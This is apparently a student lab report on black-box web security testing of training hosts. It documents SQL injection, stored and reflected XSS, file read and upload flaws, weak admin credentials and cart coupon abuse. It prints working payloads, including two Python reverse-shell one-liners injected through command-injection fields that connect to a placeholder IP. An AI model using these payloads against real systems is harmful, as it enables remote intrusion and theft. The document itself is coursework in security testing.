NCS: Lab 1 - Security Compliance

# NCS: Lab 3 - Web Security ## Student names: * Daniyar Cherekbashev * Ali Mansour * Gleb Statkevich ## Task - black box testing ## innost5/innowva host ### SQL injection in the login page Simple payload like `1' or 1=1;--` returns login success, it's admin probably because it returns the first matched record of the query, and admin has uid 1. ![](https://i.imgur.com/8tooDfS.png) ### Self-xss in the search page Simple payload like `"><img src onerror=alert(document.cookie)>` leads to self-xss. ![](https://i.imgur.com/qxepsLi.png) ### Arbitrary file read You can read contents of any file given its name via `read` endpoint ![](https://i.imgur.com/TMpJY7P.png) With this we can even extract the source code of the server ![](https://i.imgur.com/bHtNRDU.png) We see here the db name, so we can extract it too ![](https://i.imgur.com/GvfXozN.png) ### Arbitrary file upload We can upload any file with `upload` endpoint, though it was supposed to upload only car wallpaper by design ![](https://i.imgur.com/4MUhGTC.png) Confirming with arbitrary file read that it was successfully uploaded: ![](https://i.imgur.com/eaixwtD.png) ### RCE in the Server Status page After examining retrieved source code, we can see that RCE is also simply achievable in the server status with command like `google.com || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`: ![](https://i.imgur.com/BduR221.png) ![](https://i.imgur.com/WJaVkrc.png) ![](https://i.imgur.com/1AACGWP.png) Doing this leaded to DOS. Also, combined with aribtrary file upload, it makes specific things easier to execute. ## innost5/innowva host ### Stored XSS in the Guestbook and Picture comments Comment fields in the guestbook page and picture view are not properly sanitized, leading to stored XSS (with simple payload like `"><img src onerror=alert(123)>"`) which opens a potential attack-vector of stealing sensitive information like cookies ![](https://i.imgur.com/jKoAk7L.png) ![](https://i.imgur.com/MqGfvuu.png) ### SQL Injection in similar.php Register a user with simple SQL Injection like `1' or 1=1 -- ` in the first name field, then visit `http://localhost:8090/users/similar.php` endpoint ![](https://i.imgur.com/kmji0Aj.png) First name was not properly sanitized and SQL statement was executed, thus displaying all registered users ### Weak admin password Open `http://localhost:8090/admin/index.php?page=login` page (could be found in footer), simple combination of `admin:admin` worked, thus granting admin rights access ![](https://i.imgur.com/SETXJIO.png) ### Directory Listing on users, images, pictures endpoints Any of the mentioned endpoint displays all files located under this directory, which is information disclosure, as those files should not be visible to everybody ![](https://i.imgur.com/GlIfWsx.png) ### RCE on passcheck.php After entering some simple password, we can see that it is simply passed to the shell command ![](https://i.imgur.com/NaFOFCY.png) Here it is passed in `grep ^PASSWORD$`, so we need to find a way to create a reverse shell from this. If you use `grep` with only 1 parameter, it'll continuously scan the input for the entered pattern, thus just leading the system to DOS and doing nothing. So we have to use grep on some valid file and then insert our shell after it. Working payload: ` /etc/passwd && python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")' # `. We inserted space before valid readable `/etc/passwd`, so it invokes `grep ^ /etc/passwd`, then, we use `&&` with our rev shell, and then we insert a comment at the end with space so that remaining part gets discarded So we successfully get the shell! ![](https://i.imgur.com/UjnblIW.png) ### Arbitrary content and script injection at test.php Nikto scan revealed hidden file `http://localhost:8090/test.php` in the service ![](https://i.imgur.com/IiZA6We.png) Also, after getting reverse shell from aforementioned RCE, we can view the source code of this file ![](https://i.imgur.com/5YH5hFl.png) As could be seen from the source code, we can simply inject JS script from the `script` passed parameter ![](https://i.imgur.com/QDjDYUR.png) ### Completely flawed cart page After opening calendar page from the home page and scrolling through 3 days, we get the coupon `SUPERYOU21` ![](https://i.imgur.com/xIJONMt.png) If we try to apply this coupon several times, it simply allows us to do that ![](https://i.imgur.com/rh2D375.png) Now this item costs much less ![](https://i.imgur.com/v77zEzn.png) And if we are still too greedy to pay this much money, we can just grab the high quality link `http://localhost:8090/pictures/high_quality.php?picid=14&key=MzM4OTU3MA%3D%3D` that was provided to us before even paying and cancel the payment. ### Reflected XSS in search and piccheck Simple payload `"><img src onerror=alert(document.cookie)>` works for both endpoints: ![](https://i.imgur.com/QDevjCZ.png) ![](https://i.imgur.com/q5p4Idx.png)